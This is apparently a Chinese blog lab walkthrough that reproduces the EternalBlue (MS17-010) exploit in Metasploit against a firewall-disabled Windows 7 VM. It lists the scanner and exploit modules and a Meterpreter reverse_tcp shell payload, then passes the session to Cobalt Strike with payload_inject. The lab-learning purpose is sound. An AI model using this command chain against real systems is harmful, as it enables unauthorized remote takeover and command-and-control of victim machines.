永恒之蓝ms17-010复现并转移会话到CobaltStrike

一、复现环境

kali攻击机ip:192.168.10.130

靶机windows7x64,关闭防火墙,ip:192.168.10.133

说明:这里靶机需要注意一下需要64位,之前使用xp32位做的没有成功

二、复现过程

打开kali自带的MSF

msfconsole

扫描一下靶机开放的端口

可以看到开放了445端口,永恒之蓝就是利用了445端口

搜索一下ms17-010漏洞

search ms17-010

exploit为攻击模块,auxiliary为辅助扫描模块

先用auxiliary辅助扫描看一下是否存在永恒之蓝漏洞,如果有再去使用攻击模块攻击

use auxiliary/scanner/smb/smb_ms17_010

 可以看到已经进入模块下

options命令可以查看需要配置的参数

Required下面的yes对应的是必填的 选项

RHOST为靶机IP地址

RPORT为要攻击的端口,这里默认445,不需要配置

接下来就要配置参数了

 可以看到极大可能存在MS17-010漏洞,并猜测了靶机对应的版本

进入攻击模块

use exploit/windows/smb/ms17_010_eternalblue

会显示没有payload,但它默认给你添加上了

以防万一我们再添加一边payload熟悉一下操作

set payload windows/x64/meterpreter/reverse_tcp

 利用show payloads命令可以查看当下漏洞利用模块下可用的所有payload

进行攻击

 攻击成功后建立了session

  background  退回模块下

sessions -i  查看会话信息

session的id号为2

三、会话转移

打开CobaltStrike设置监听

 

use exploit/windows/local/payload_inject

  使用该模块可以将 Metasploit 获取到的会话注入到CS中。

 

配置payload

set payload windows/meterpreter/reverse_http

 

配置端口,端口为CobaltStrike自己设置监听的端口

 

 运行

 

这时CS中会出现转移的会话

 参考文章:永恒之蓝漏洞复现(ms17-010)_flyhite的博客-CSDN博客_ms17-010

 

 

 

 ,

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值